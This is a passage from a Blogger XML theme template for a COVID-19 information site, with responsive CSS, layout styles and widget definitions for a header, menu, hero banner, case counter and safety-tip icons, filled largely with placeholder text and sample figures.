#footer-copyright .copyright-area a:hover{
text-decoration:underline
}
.hidden-widgets{
display:none;
visibility:hidden
}
.back-top{
display:none;
z-index:1010;
width:32px;
height:32px;
position:fixed;
bottom:25px;
right:25px;
background-color:$(main.color);
cursor:pointer;
overflow:hidden;
font-size:19px;
color:#fff;
text-align:center;
line-height:32px;
border-radius:3px
}
.back-top:after{
content:'\f106';
position:relative;
font-family:FontAwesome;
font-weight:400
}
.error404 #main-wrapper{
width:100%!important;
margin:0!important
}
.error404 #sidebar-wrapper{
display:none
}
.errorWrap{
color:$(title.color);
text-align:center;
padding:60px 0 100px
}
.errorWrap h3{
font-size:130px;
line-height:1;
margin:0 0 30px
}
.errorWrap h4{
font-size:25px;
margin:0 0 20px
}
.errorWrap p{
margin:0 0 10px
}
.errorWrap a{
display:block;
color:$(main.color);
padding:10px 0 0
}
.errorWrap a i{
font-size:14px
}
.errorWrap a:hover{
text-decoration:underline
}
@media (max-width: 1040px) {
.row{
width:100%
}
#header-wrap, .home #header-wrap, .item #header-wrap, #intro-author-wrap .container,#content-wrapper,#testimonial-wrap .container,#contact-area > .container,#footer-copyright > .container, #top-bar .container, .faq-toggle .container{
box-sizing:border-box;
padding:0 20px
}
#intro-services-wrap{
box-sizing:border-box;
padding:80px 20px
}
.counter-box {
padding: 0;
}
.counter-box-wrap,.counter-title {
border-radius:0;
}
#testimonial .widget {
width: 50%;
}
#testimonial .widget:nth-child(4), #testimonial .widget:nth-child(5) {
margin-bottom: 20px;
}
}
@media (max-width: 980px) {
#main-menu{
display:none
}
.mobile-menu-wrap,.mobile-menu-toggle{
display:block
}
.counter-box-item {
width: 50%;
}
.faq-toggle {
background-attachment: inherit;
}
#content-wrapper > .container{
margin:0
}
.item #main-wrapper,#sidebar-wrapper{
width:100%;
padding:0
}
#brand-services-wrap li {
width: calc(100% / 3);
margin-bottom: 30px;
}
}
@media (max-width: 780px) {
#main-intro{
height:380px
}
.author-intro-widgets .author-list, .author-intro-widgets .author-list .widget {
width: 100%;
}
#brand-services-wrap {
padding: 20px 0;
}
#intro-author-heading, .author-intro-widgets {
width: 100%;
}
#intro-author-photo{
display:none;
}
.post-snippet {
font-size: 13px;
margin: 0;
}
.index-post .post-info > h2 {
font-size: 22px;
}
#testimonial .widget{
width: calc(100% / 2);
margin-bottom: 10px;
}
#testimonial .widget:first-child, #testimonial .widget:nth-child(2), #testimonial .widget:nth-child(3), #testimonial .widget:nth-child(4) {
margin-bottom:10px;
}
.author-intro-widgets {
margin: 0;
}
#social-footer{
width:100%;
margin:0 0 10px
}
.social-footer ul li{
margin:0 7px
}
#footer-copyright .copyright-area{
width:100%;
text-align:center;
overflow:hidden;
}
.top-bar-nav {
width: 100%;
text-align: center;
clear: both;
}
.top-bar-nav ul li {
float: none;
display: inline-block;
}
.errorWrap{
padding:60px 0 80px
}
.testi-avatar {
border-radius: inherit;
}
.faq-toggle .faq-title-sec h1 {
font-size: 22px;
}
.faq-toggle .faq-title-sec h1:before, .faq-toggle .faq-title-sec h1:after {
display:none;
}
}
@media (max-width:767px) {
.intro-snippet {
font-size: 13px;
}
.intro-title {
font-size: 30px;
margin: 0 0 10px;
}
.intro-action a {
margin: 10px 0 0;
}
.kovid-hex {
width: 170px;
}
}
@media (max-width: 680px) {
.intro-content{
width:100%;
box-sizing:border-box;
padding:0 40px
}
.intro-content {
top: 60%;
transform: translate(-50%,-40%);
}
#intro-services .widget{
width:100%;
margin:50px 0 0
}
#intro-services .widget:first-child{
margin:0
}
#contact-left,#contact-right{
width:100%
}
#contact-left .widget:last-child{
margin:0 0 35px
}
.post-labels{
width:100%;
margin:0 0 25px
}
.post-labels a{
margin:0 10px 5px 0
}
.post-share{
float:left
}
.share-links li{
margin:5px 5px 0 0
}
}
@media (max-width: 540px) {
#main-intro{
height:auto
}
.top-bar-social {
float: none;
text-align: center;
}
.top-bar-social ul > li {
float: none;
}
.author-intro-widgets .author-list {
width: 100%;
}
#brand-services-wrap {
padding: 10px 0;
}
.index-post {
width: 100%;
}
.intro-title{
font-size:27px
}
#intro-author-wrap{
padding:50px 0 0
}
#content-wrapper{
margin:50px 0
}
.item #content-wrapper{
margin:40px 0
}
.testi-avatar {
width: 200px;
height: 200px;
float: none;
margin: 0 auto;
}
.testi-info {
text-align: center;
}
.email-folower .email-letter-text, .email-folower .follow-by-email-inner {
float: none;
width: 100%;
padding: 0;
}
ul.related-posts{
margin:0
}
.related-posts .related-item{
width:100%;
padding:0;
margin:20px 0 0
}
.related-posts .item-0{
margin:0
}
.related-posts .post-image-link{
width:75px;
height:60px;
float:left;
margin:0 12px 0 0
}
.related-posts .post-title{
font-size:15px;
overflow:hidden;
margin:0 0 5px
}
#brand-services-wrap li {
width: calc(100% / 2);
}
}
@media (max-width: 440px) {
#testimonial .widget {
width: 100%;
margin-bottom: 10px;
}
.counter-box-item {
width: 100%;
}
.item-post h1.post-title{
font-size:23px
}
.head-text .widget-content{
line-height:24px
}
}
@media (max-width: 360px) {
.intro-title,.author-title,.head-text .widget-title > h3{
font-size:25px
}
.index-post{
width:100%
}
.errorWrap h3{
font-size:120px
}
.errorWrap h4{
font-weight:600
}
}
]]></b:skin>
<style>
/*-------Typography and ShortCodes-------*/
.firstcharacter{float:left;color:#27ae60;font-size:75px;line-height:60px;padding-top:4px;padding-right:8px;padding-left:3px}.post-body h1,.post-body h2,.post-body h3,.post-body h4,.post-body h5,.post-body h6{margin-bottom:15px;color:#2c3e50}blockquote{font-style:italic;color:#888;border-left:5px solid #27ae60;margin-left:0;padding:10px 15px}blockquote:before{content:'\f10d';display:inline-block;font-family:FontAwesome;font-style:normal;font-weight:400;line-height:1;-webkit-font-smoothing:antialiased;-moz-osx-font-smoothing:grayscale;margin-right:10px;color:#888}blockquote:after{content:'\f10e';display:inline-block;font-family:FontAwesome;font-style:normal;font-weight:400;line-height:1;-webkit-font-smoothing:antialiased;-moz-osx-font-smoothing:grayscale;margin-left:10px;color:#888}.button{background-color:#2c3e50;float:left;padding:5px 12px;margin:5px;color:#fff;text-align:center;border:0;cursor:pointer;border-radius:3px;display:block;text-decoration:none;font-weight:400;transition:all .3s ease-out !important;-webkit-transition:all .3s ease-out !important}a.button{color:#fff}.button:hover{background-color:#27ae60;color:#fff}.button.small{font-size:12px;padding:5px 12px}.button.medium{font-size:16px;padding:6px 15px}.button.large{font-size:18px;padding:8px 18px}.small-button{width:100%;overflow:hidden;clear:both}.medium-button{width:100%;overflow:hidden;clear:both}.large-button{width:100%;overflow:hidden;clear:both}.demo:before{content:"\f06e";margin-right:5px;display:inline-block;font-family:FontAwesome;font-style:normal;font-weight:400;line-height:normal;-webkit-font-smoothing:antialiased;-moz-osx-font-smoothing:grayscale}.download:before{content:"\f019";margin-right:5px;display:inline-block;font-family:FontAwesome;font-style:normal;font-weight:400;line-height:normal;-webkit-font-smoothing:antialiased;-moz-osx-font-smoothing:grayscale}.buy:before{content:"\f09d";margin-right:5px;display:inline-block;font-family:FontAwesome;font-style:normal;font-weight:400;line-height:normal;-webkit-font-smoothing:antialiased;-moz-osx-font-smoothing:grayscale}.visit:before{content:"\f14c";margin-right:5px;display:inline-block;font-family:FontAwesome;font-style:normal;font-weight:400;line-height:normal;-webkit-font-smoothing:antialiased;-moz-osx-font-smoothing:grayscale}.widget .post-body ul,.widget .post-body ol{line-height:1.5;font-weight:400}.widget .post-body li{margin:5px 0;padding:0;line-height:1.5}.post-body ul li:before{content:"\f105";margin-right:5px;font-family:fontawesome}pre{font-family:Monaco, "Andale Mono", "Courier New", Courier, monospace;background-color:#2c3e50;background-image:-webkit-linear-gradient(rgba(0, 0, 0, 0.05) 50%, transparent 50%, transparent);background-image:-moz-linear-gradient(rgba(0, 0, 0, 0.05) 50%, transparent 50%, transparent);background-image:-ms-linear-gradient(rgba(0, 0, 0, 0.05) 50%, transparent 50%, transparent);background-image:-o-linear-gradient(rgba(0, 0, 0, 0.05) 50%, transparent 50%, transparent);background-image:linear-gradient(rgba(0, 0, 0, 0.05) 50%, transparent 50%, transparent);-webkit-background-size:100% 50px;-moz-background-size:100% 50px;background-size:100% 50px;line-height:25px;color:#f1f1f1;position:relative;padding:0 7px;margin:15px 0 10px;overflow:hidden;word-wrap:normal;white-space:pre;position:relative}pre:before{content:'Code';display:block;background:#F7F7F7;margin-left:-7px;margin-right:-7px;color:#2c3e50;padding-left:7px;font-weight:400;font-size:14px}pre code,pre .line-number{display:block}pre .line-number a{color:#27ae60;opacity:0.6}pre .line-number span{display:block;float:left;clear:both;width:20px;text-align:center;margin-left:-7px;margin-right:7px}pre .line-number span:nth-child(odd){background-color:rgba(0, 0, 0, 0.11)}pre .line-number span:nth-child(even){background-color:rgba(255, 255, 255, 0.05)}pre .cl{display:block;clear:both}#contact{background-color:#fff;margin:30px 0 !important}#contact .contact-form-widget{max-width:100% !important}#contact .contact-form-name,#contact .contact-form-email,#contact .contact-form-email-message{background-color:#FFF;border:1px solid #eee;border-radius:3px;padding:10px;margin-bottom:10px !important;max-width:100% !important}#contact .contact-form-name{width:47.7%;height:50px}#contact .contact-form-email{width:49.7%;height:50px}#contact .contact-form-email-message{height:150px}#contact .contact-form-button-submit{max-width:100%;width:100%;z-index:0;margin:4px 0 0;padding:10px !important;text-align:center;cursor:pointer;background:#27ae60;border:0;height:auto;-webkit-border-radius:2px;-moz-border-radius:2px;-ms-border-radius:2px;-o-border-radius:2px;border-radius:2px;text-transform:uppercase;-webkit-transition:all .2s ease-out;-moz-transition:all .2s ease-out;-o-transition:all .2s ease-out;-ms-transition:all .2s ease-out;transition:all .2s ease-out;color:#FFF}#contact .contact-form-button-submit:hover{background:#2c3e50}#contact .contact-form-email:focus,#contact .contact-form-name:focus,#contact .contact-form-email-message:focus{box-shadow:none !important}.alert-message{position:relative;display:block;background-color:#FAFAFA;padding:20px;margin:20px 0;-webkit-border-radius:2px;-moz-border-radius:2px;border-radius:2px;color:#2f3239;border:1px solid}.alert-message p{margin:0 !important;padding:0;line-height:22px;font-size:13px;color:#2f3239}.alert-message span{font-size:14px !important}.alert-message i{font-size:16px;line-height:20px}.alert-message.success{background-color:#f1f9f7;border-color:#e0f1e9;color:#1d9d74}.alert-message.success a,.alert-message.success span{color:#1d9d74}.alert-message.alert{background-color:#DAEFFF;border-color:#8ED2FF;color:#378FFF}.alert-message.alert a,.alert-message.alert span{color:#378FFF}.alert-message.warning{background-color:#fcf8e3;border-color:#faebcc;color:#8a6d3b}.alert-message.warning a,.alert-message.warning span{color:#8a6d3b}.alert-message.error{background-color:#FFD7D2;border-color:#FF9494;color:#F55D5D}.alert-message.error a,.alert-message.error span{color:#F55D5D}.fa-check-circle:before{content:"\f058"}.fa-info-circle:before{content:"\f05a"}.fa-exclamation-triangle:before{content:"\f071"}.fa-exclamation-circle:before{content:"\f06a"}.post-table table{border-collapse:collapse;width:100%}.post-table th{background-color:#eee;font-weight:bold}.post-table th,.post-table td{border:0.125em solid #333;line-height:1.5;padding:0.75em;text-align:left}@media (max-width: 30em){.post-table thead tr{position:absolute;top:-9999em;left:-9999em}.post-table tr{border:0.125em solid #333;border-bottom:0}.post-table tr + tr{margin-top:1.5em}.post-table tr,.post-table td{display:block}.post-table td{border:none;border-bottom:0.125em solid #333;padding-left:50%}.post-table td:before{content:attr(data-label);display:inline-block;font-weight:bold;line-height:1.5;margin-left:-100%;width:100%}}@media (max-width: 20em){.post-table td{padding-left:0.75em}.post-table td:before{display:block;margin-bottom:0.75em;margin-left:0}}
.FollowByEmail {
clear: both;
}
.widget .post-body ol {
padding: 0 0 0 15px;
}
.post-body ul li {
list-style: none;
}
</style>
<b:if cond='data:view.isLayoutMode'>
<b:template-skin>
<![CDATA[
/*------Layout (No Edit)----------*/
body#layout {
width:800px;
}
body#layout #loader {
display:none;
}
body#layout .counter-box {
padding: 0;
}
body#layout #outer-wrapper,body#layout .row{
width:auto;
padding:0
}
body#layout{
width:800px;
position:relative;
padding:95px 5px 0;
margin:0
}
body#layout div.section{
margin:0 5px 10px!important;
padding:16px 16px 18px!important
}
body#layout #brand-services-wrap {
display: block;
padding: 0;
}
body#layout .section h4{
font-size:14px;
margin:0
}
body#layout .email-folower {
padding: 0;
}
body#layout .layout-widget-description{
display:none
}
body#layout .theme-options,body#layout #main-menu .widget{
display:block!important
}
body#layout div.sora-panel{
background-color:#d7d7d7!important;
overflow:hidden!important;
border-color:#bcbcbc
}
body#layout #intro-author .widget-content {
height: 224px;
}
body#layout #header-wrap{
height:auto;
position: static;
}
body#layout .author-intro-widgets {
}
body#layout .header-header{
padding:0
}
body#layout div.header-logo{
float:none;
width:auto;
height:auto;
max-width:none
}
body#layout .mobile-menu{
display:none
}
body#layout #header-wrap .container{
display:flex
}
body#layout #header-logo,body#layout #main-menu{
width:50%;
height:auto
}
body#layout #intro-wrap,body#layout #intro-author-wrap,body#layout #intro-services-wrap,body#layout #testimonial-wrap,body#layout #contact-area{
display:block;
padding:0;
margin:0
}
body#layout #intro-wrap,body#layout #main-intro{
float:none;
width:auto;
height:auto
}
body#layout #main-intro .widget{
height:auto;
overflow:visible
}
body#layout #intro-author-photo{
display:none
}
body#layout #intro-author{
width:auto
}
body#layout #content-wrapper{
margin:0
}
body#layout #content-wrapper > .container{
margin:0
}
body#layout .head-text,body#layout #testimonial{
float:none;
width:auto
}
body#layout #main-wrapper{
width: 65%;
padding: 0;
margin: 0;
float: left;
}
body#layout #contact-area .container{
display:flex
}
body#layout #contact-area .section{
width:50%
}
body#layout .contact-col .Text .widget-content{
margin:0
}
body#layout #sidebar-wrapper{
float:right;
display: block;
width: 35%;
padding: 0;
}
body#layout .sidebar .widget,body#layout .sidebar .widget-content{float:none;overflow:visible;width:auto;}
body#layout .top-bar-nav, body#layout .top-bar-social {
width: auto;
float:none;
}
body#layout #top-bar {
height: auto;
}
body#layout #testimonial {
display: block;
}
body#layout .faq-toggle {
display: none;
}
body#layout .author-intro-widgets .author-list {
width: 44.5%;
float: left;
}
body#layout #footer-copyright{
padding:0
}
body#layout .top-bar-social .FollowByEmail {
max-width: 100%;
}
body#layout #intro-author-heading {
width: auto;
float: none;
display: block;
}
body#layout #intro-author-wrap .container {
display:block;
}
body#layout .author-intro-widgets {
margin:0 auto;
}
/*------Layout (end)----------*/
]]></b:template-skin>
</b:if>
<!-- Global Variables -->
<script type='text/javascript'>
//<![CDATA[
// Global variables with content. "Available for Edit"
var monthFormat = ["January", "February", "March", "April", "May", "June", "July", "August", "September", "October", "November", "December"],
noThumbnail = "https://4.bp.blogspot.com/-O3EpVMWcoKw/WxY6-6I4--I/AAAAAAAAB2s/KzC0FqUQtkMdw7VzT6oOR_8vbZO6EJc-ACK4BGAYYCw/s1600/nth.png",
postPerPage = 8,
commentsSystem = "blogger",
disqusShortname = "soratemplates";
//]]>
</script>
<b:defaultmarkups>
<b:defaultmarkup type='Common'>
<b:includable id='widget-title'>
<b:if cond='data:defaultTitle or data:title'>
<div class='widget-title'>
<h3 class='title'>
<data:title/>
</h3>
</div>
</b:if>
</b:includable>
</b:defaultmarkup>
<b:defaultmarkup type='Header'>
<b:includable id='main' var='this'>
<div class='header-widget'>
<b:include cond='data:imagePlacement in {"REPLACE", "BEFORE_DESCRIPTION"}' name='image'/>
<b:include cond='data:imagePlacement not in {"REPLACE", "BEFORE_DESCRIPTION"}' name='title'/>
<b:include cond='data:imagePlacement != "REPLACE"' name='description'/>
</div>
</b:includable>
<b:includable id='description'>
<p>
<data:this.description/>
</p>
</b:includable>
<b:includable id='image'>
<a class='header-brand' expr:href='data:blog.homepageUrl'>
<img expr:alt='data:blog.title.escaped' expr:data-height='data:height' expr:data-width='data:width' expr:src='data:image'/>
</a>
</b:includable>
<b:includable id='title'>
<h1>
<b:tag cond='data:view.url != data:blog.homepageUrl' expr:href='data:blog.homepageUrl' name='a'>
<data:title/>
</b:tag>
</h1>
</b:includable>
</b:defaultmarkup>
<b:defaultmarkup type='Label'>
<b:includable id='main' var='this'>
<b:include name='widget-title'/>
<b:include name='content'/>
</b:includable>
<b:includable id='content'>
<div class='widget-content'>
<b:class expr:name='data:this.display + "-label"'/>
<b:include cond='data:this.display == "list"' name='list'/>
<b:include cond='data:this.display == "cloud"' name='list'/>
</div>
</b:includable>
<b:includable id='list'>
<ul>
<b:loop values='data:labels' var='label'>
<li>
<a class='label-name' expr:href='data:label.url'>
<data:label.name/>
<b:if cond='data:this.showFreqNumbers'>
<span class='label-count'>(<data:label.count/>)</span>
</b:if>
</a>
</li>
</b:loop>
</ul>
</b:includable>
</b:defaultmarkup>
</b:defaultmarkups>
<!-- Google Analytics -->
<b:include data='blog' name='google-analytics'/>
</head>
<body expr:class='data:blog.pageType'>
<b:class cond='data:view.isHomepage' name='home'/>
<b:class cond='data:view.isPage' name='item'/>
<b:class cond='data:view.isArchive' name='index'/>
<b:class cond='data:view.isError' name='error404'/>
<div id='loader'>
<img id='stringPreloader' src='https://1.bp.blogspot.com/-9FoZYOAxxiM/Xtpgp_VwTbI/AAAAAAAAIqk/iPWQg-WebkcU5CyDM0QKBvofU5YhPOPqACK4BGAsYHg/virus.png'/>
</div>
<!-- Theme Options -->
<div class='theme-options' style='display:none'>
<b:section class='sora-panel' id='sora-panel' maxwidgets='1' name='Theme Options' showaddelement='no'>
<b:widget id='LinkList71' locked='true' title='Default Variables' type='LinkList' version='2' visible='true'>
<b:widget-settings>
<b:widget-setting name='link-3'>6</b:widget-setting>
<b:widget-setting name='sorting'>NONE</b:widget-setting>
<b:widget-setting name='text-1'>commentsSystem</b:widget-setting>
<b:widget-setting name='link-1'>blogger</b:widget-setting>
<b:widget-setting name='text-0'>disqusShortname</b:widget-setting>
<b:widget-setting name='link-2'>8</b:widget-setting>
<b:widget-setting name='text-3'>postPerPage</b:widget-setting>
<b:widget-setting name='link-0'>soratemplates</b:widget-setting>
<b:widget-setting name='text-2'>postPerPage</b:widget-setting>
</b:widget-settings>
<b:includable id='main'>
<b:include name='content'/>
</b:includable>
<b:includable id='content'>
<script type='text/javascript'>
//<![CDATA[
<b:loop values='data:links' var='link'>
<b:if cond='data:link.name == "postPerPage"'>
var postPerPage = <data:link.target/>;
</b:if>
<b:if cond='data:link.name == "commentsSystem"'>
var commentsSystem = "<data:link.target/>";
</b:if>
<b:if cond='data:link.name == "disqusShortname"'>
var disqusShortname = "<data:link.target/>";
</b:if>
</b:loop>
//]]>
</script>
</b:includable>
</b:widget>
</b:section>
</div>
<!-- Outer Wrapper -->
<div id='outer-wrapper'>
<!-- Header Wrapper -->
<div id='header-wrap'>
<div class='container row'>
<b:section class='header-logo' id='header-logo' maxwidgets='1' name='Header Logo' showaddelement='yes'>
<b:widget id='Header1' locked='true' title='Kovid (Header)' type='Header' version='2' visible='true'>
<b:widget-settings>
<b:widget-setting name='displayUrl'>http://4.bp.blogspot.com/-w5_hbdEE6z8/XsuEGSIp9dI/AAAAAAAAIdE/vqukiTT-wzgyTox9IRlEndclWzgHgywTACK4BGAYYCw/s1600/Kovid.png</b:widget-setting>
<b:widget-setting name='displayHeight'>38</b:widget-setting>
<b:widget-setting name='sectionWidth'>150</b:widget-setting>
<b:widget-setting name='useImage'>true</b:widget-setting>
<b:widget-setting name='shrinkToFit'>false</b:widget-setting>
<b:widget-setting name='imagePlacement'>REPLACE</b:widget-setting>
<b:widget-setting name='displayWidth'>172</b:widget-setting>
</b:widget-settings>
<b:includable id='main' var='this'>
<div class='header-widget'>
<b:include cond='data:imagePlacement in {"REPLACE", "BEFORE_DESCRIPTION"}' name='image'/>
<b:include cond='data:imagePlacement not in {"REPLACE", "BEFORE_DESCRIPTION"}' name='title'/>
<b:include cond='data:imagePlacement != "REPLACE"' name='description'/>
</div>
</b:includable>
<b:includable id='behindImageStyle'>
<b:if cond='data:sourceUrl'>
<b:include cond='data:this.image' data='{ image: data:this.image, selector: ".header-widget" }' name='responsiveImageStyle'/>
<style type='text/css'>
.header-widget {
background-position: <data:blog.locale.languageAlignment/>;
background-repeat: no-repeat;
}
</style>
</b:if>
</b:includable>
<b:includable id='description'>
<p>
<data:this.description/>
</p>
</b:includable>
<b:includable id='image'>
<a class='header-brand' expr:href='data:blog.homepageUrl'>
<img expr:alt='data:blog.title.escaped' expr:data-height='data:height' expr:data-width='data:width' expr:src='data:image'/>
</a>
</b:includable>
<b:includable id='title'>
<h1>
<b:tag cond='data:view.url != data:blog.homepageUrl' expr:href='data:blog.homepageUrl' name='a'>
<data:title/>
</b:tag>
</h1>
</b:includable>
</b:widget>
</b:section>
<b:section class='main-menu' id='main-menu' maxwidgets='1' name='Main Menu' showaddelement='yes'>
<b:widget id='LinkList74' locked='true' title='Menu Widget' type='LinkList' version='2' visible='true'>
<b:widget-settings>
<b:widget-setting name='text-10'>_Web Documentation</b:widget-setting>
<b:widget-setting name='sorting'>NONE</b:widget-setting>
<b:widget-setting name='link-1'>#</b:widget-setting>
<b:widget-setting name='link-2'>#</b:widget-setting>
<b:widget-setting name='link-12'>https://www.soratemplates.com/2020/06/kovid-blogger-templates.html</b:widget-setting>
<b:widget-setting name='link-0'>/</b:widget-setting>
<b:widget-setting name='link-11'>https://youtu.be/T0twwr_Jqoc</b:widget-setting>
<b:widget-setting name='link-10'>https://www.sorabloggingtips.com/2020/06/how-to-setup-kovid-blogger-template.html</b:widget-setting>
<b:widget-setting name='text-9'>Documentation</b:widget-setting>
<b:widget-setting name='link-9'>#</b:widget-setting>
<b:widget-setting name='text-8'>_Error Page</b:widget-setting>
<b:widget-setting name='link-7'>https://www.sorabloggingtips.com/2017/01/how-to-add-sitemap-widget-in-blogspot-blogs.html</b:widget-setting>
<b:widget-setting name='link-8'>https://kovid-soratemplates.blogspot.com/soratemplates</b:widget-setting>
<b:widget-setting name='link-5'>#</b:widget-setting>
<b:widget-setting name='link-6'>https://kovid-soratemplates.blogspot.com/p/shortcodes-typography.html</b:widget-setting>
<b:widget-setting name='link-3'>#</b:widget-setting>
<b:widget-setting name='link-4'>#</b:widget-setting>
<b:widget-setting name='text-1'>Features</b:widget-setting>
<b:widget-setting name='text-0'>Home</b:widget-setting>
<b:widget-setting name='text-3'>__DropDown 1</b:widget-setting>
<b:widget-setting name='text-2'>_Multi DropDown</b:widget-setting>
<b:widget-setting name='text-5'>__DropDown 3</b:widget-setting>
<b:widget-setting name='text-4'>__DropDown 2</b:widget-setting>
<b:widget-setting name='text-7'>_SiteMap</b:widget-setting>
<b:widget-setting name='text-6'>_ShortCodes</b:widget-setting>
<b:widget-setting name='text-11'>_Video Documentation</b:widget-setting>
<b:widget-setting name='text-12'>Download This Template</b:widget-setting>
</b:widget-settings>
<b:includable id='main'>
<b:include name='content'/>
</b:includable>
<b:includable id='content'>
<ul id='main-menu-nav' role='menubar'>
<b:loop values='data:links' var='link'>
<li><a expr:href='data:link.target' role='menuitem'><data:link.name/></a></li>
</b:loop>
</ul>
</b:includable>
</b:widget>
</b:section>
<span class='mobile-menu-toggle'/>
</div>
<div class='mobile-menu-wrap'>
<div class='mobile-menu'/>
</div>
</div>
<div class='clearfix'/>
<b:if cond='data:view.isHomepage'>
<!-- Featured Slider -->
<div id='intro-wrap'>
<b:section class='full-height' id='main-intro' maxwidgets='1' name='Main Intro' showaddelement='no'>
<b:widget id='Image1' locked='true' title='Stay Safe. Stay Home.' type='Image' version='2' visible='true'>
<b:widget-settings>
<b:widget-setting name='displayUrl'>http://3.bp.blogspot.com/-1Wjz3RgrPaM/XsuCnSTgGNI/AAAAAAAAIc0/3R0-l1WjTesHJNN3cfz3ko5uIFHMTXqlgCK4BGAYYCw/s1600/banner-hero.png</b:widget-setting>
<b:widget-setting name='displayHeight'>770</b:widget-setting>
<b:widget-setting name='sectionWidth'>150</b:widget-setting>
<b:widget-setting name='shrinkToFit'>false</b:widget-setting>
<b:widget-setting name='displayWidth'>1600</b:widget-setting>
<b:widget-setting name='link'>/#Discover More</b:widget-setting>
<b:widget-setting name='caption'><![CDATA[Human coronaviruses are common and are typically associated with mild illnesses, similar to the common cold.The corona virus COVID-19 is affecting 210 countries & territories around the world and 2 international conveyances.]]></b:widget-setting>
</b:widget-settings>
<b:includable id='main'>
<b:include name='content'/>
</b:includable>
<b:includable id='content'>
<div class='widget-content'>
<style type='text/css'>
#intro-wrap{display:block}
#main-intro{background-image:url(<data:sourceUrl/>)}
</style>
<div class='intro-content'>
<h3 class='intro-title'><data:title/></h3>
<b:if cond='data:caption'>
<p class='intro-snippet'><data:caption/></p>
</b:if>
<b:if cond='data:link'>
<div class='intro-action'>
<script type="text/javascript">
var ilc = "<data:link/>",
ima = ilc.split("#"),
ili = ima[0].trim(),
ilt = ima[1].trim(),
kod = "<a href="+ ili +">"+ ilt +"</a>";
document.write(kod)
</script>
</div>
</b:if>
</div>
</div>
</b:includable>
</b:widget>
</b:section>
</div>
<div class='clearfix'/>
<div class='counter-box'>
<b:section class='container row counter-box-wrap' id='counter-bar-nav' maxwidgets='1' name='Case Counter' showaddelement='no'>
<b:widget id='LinkList77' locked='true' title='' type='LinkList' version='2' visible='true'>
<b:widget-settings>
<b:widget-setting name='link-3'>Countries</b:widget-setting>
<b:widget-setting name='sorting'>NONE</b:widget-setting>
<b:widget-setting name='text-1'>2467603</b:widget-setting>
<b:widget-setting name='link-1'>Recovered</b:widget-setting>
<b:widget-setting name='text-0'>5738818</b:widget-setting>
<b:widget-setting name='link-2'>Total Deaths</b:widget-setting>
<b:widget-setting name='text-3'>219</b:widget-setting>
<b:widget-setting name='link-0'>Total Cases</b:widget-setting>
<b:widget-setting name='text-2'>354610</b:widget-setting>
</b:widget-settings>
<b:includable id='main'>
<div class='counter-title'>
<h4><span>Live</span><span>Update</span></h4>
<span>world update</span>
</div>
<div class='clearfix'/>
<b:include name='content'/>
</b:includable>
<b:includable id='content'>
<div class='widget-content'>
<ul>
<b:loop values='data:links' var='link'>
<li class='counter-box-item'><h1 class='counter-sora'><data:link.name/></h1>
<div class='counter-sora-text'><data:link.target/></div></li>
</b:loop>
<div class='clearfix'/>
</ul>
</div>
</b:includable>
</b:widget>
</b:section>
</div>
<div class='clearfix'/>
<div id='intro-author-wrap'>
<div class='container row'>
<b:section id='intro-author-heading' maxwidgets='2' name='Headline Text 01' showaddelement='no'>
<b:widget id='HTML1' locked='true' title='How To Protect Yourself' type='HTML' version='2' visible='true'>
<b:widget-settings>
<b:widget-setting name='content'>It is a long established fact that a reader will be distracted by the readable content of a page when looking at its layout. The point of using Lorem Ipsum is that it has a more-or-less normal distribution of letters, as opposed to using 'Content here, content here', making it look like readable English.
Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry's standard dummy text ever since. Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry's standard dummy text ever since.
<div class="small-button">
<a class="button medium" href="#">Learn Methods</a>
</div></b:widget-setting>
</b:widget-settings>
<b:includable id='main'>
<div class='author-content'>
<style type='text/css'>
#intro-author-wrap{display:block}
</style>
<h3 class='author-title'><data:title/></h3>
<b:if cond='data:content'>
<p class='author-snippet'><data:content/></p>
</b:if>
</div>
</b:includable>
</b:widget>
</b:section>
<div class='author-intro-widgets'>
<b:section class='author-list left-side-widget' id='intro-services-left' maxwidgets='8' name='Don't' showaddelement='yes'>
<b:widget id='Image21' locked='true' title='Avoid Close Contact' type='Image' version='2' visible='true'>
<b:widget-settings>
<b:widget-setting name='displayUrl'>http://2.bp.blogspot.com/-D4ij0krr35A/Xs5qD3iOlzI/AAAAAAAAIfw/YrDnap6542M0__aPuNVuBFHcvZ-CXvKPACK4BGAYYCw/s1600/donts-1.png</b:widget-setting>
<b:widget-setting name='displayHeight'>160</b:widget-setting>
<b:widget-setting name='sectionWidth'>201</b:widget-setting>
<b:widget-setting name='shrinkToFit'>false</b:widget-setting>
<b:widget-setting name='displayWidth'>160</b:widget-setting>
<b:widget-setting name='link'>image</b:widget-setting>
<b:widget-setting name='caption'>Lorem Ipsum is simply dummy text of the printing and typesetting industry.</b:widget-setting>
</b:widget-settings>
<b:includable id='main'>
<b:include name='content'/>
</b:includable>
<b:includable id='content'>
<div class='widget-content'>
<style type='text/css'>
#intro-author-wrap{display:block}
</style>
<div class='service-content'>
<b:if cond='data:link == "image"'>
<b:class name='service-icon-image'/>
<span class='service-icon'><img expr:alt='data:title' expr:src='data:sourceUrl'/></span>
<b:else/>
<span class='service-icon'><i expr:class='"fa " + data:link'/></span>
</b:if>
<div class='service-content-details'>
<h3 class='service-title'><data:title/></h3>
<b:if cond='data:caption'>
<p class='service-snippet'><data:caption/></p>
</b:if>
</div>
</div>
</div>
</b:includable>
</b:widget>
<b:widget id='Image22' locked='true' title='Don’t Touch Face' type='Image' version='2' visible='true'>
<b:widget-settings>
<b:widget-setting name='displayUrl'>http://4.bp.blogspot.com/-TGpYdw1TyGc/Xs5qKXPC8YI/AAAAAAAAIgA/7D2bDzqZ1f45uhfQz6gZ5BIA4TwATChBACK4BGAYYCw/s1600/donts-2.png</b:widget-setting>
<b:widget-setting name='displayHeight'>160</b:widget-setting>
<b:widget-setting name='sectionWidth'>201</b:widget-setting>
<b:widget-setting name='shrinkToFit'>false</b:widget-setting>
<b:widget-setting name='displayWidth'>160</b:widget-setting>
<b:widget-setting name='link'>image</b:widget-setting>
<b:widget-setting name='caption'>Lorem Ipsum is simply dummy text of the printing and typesetting industry.</b:widget-setting>
</b:widget-settings>
<b:includable id='main'>
<b:include name='content'/>
</b:includable>
<b:includable id='content'>
<div class='widget-content'>
<style type='text/css'>
#intro-author-wrap{display:block}
</style>
<div class='service-content'>
<b:if cond='data:link == "image"'>
<b:class name='service-icon-image'/>
<span class='service-icon'><img expr:alt='data:title' expr:src='data:sourceUrl'/></span>
<b:else/>
<span class='service-icon'><i expr:class='"fa " + data:link'/></span>
</b:if>
<div class='service-content-details'>
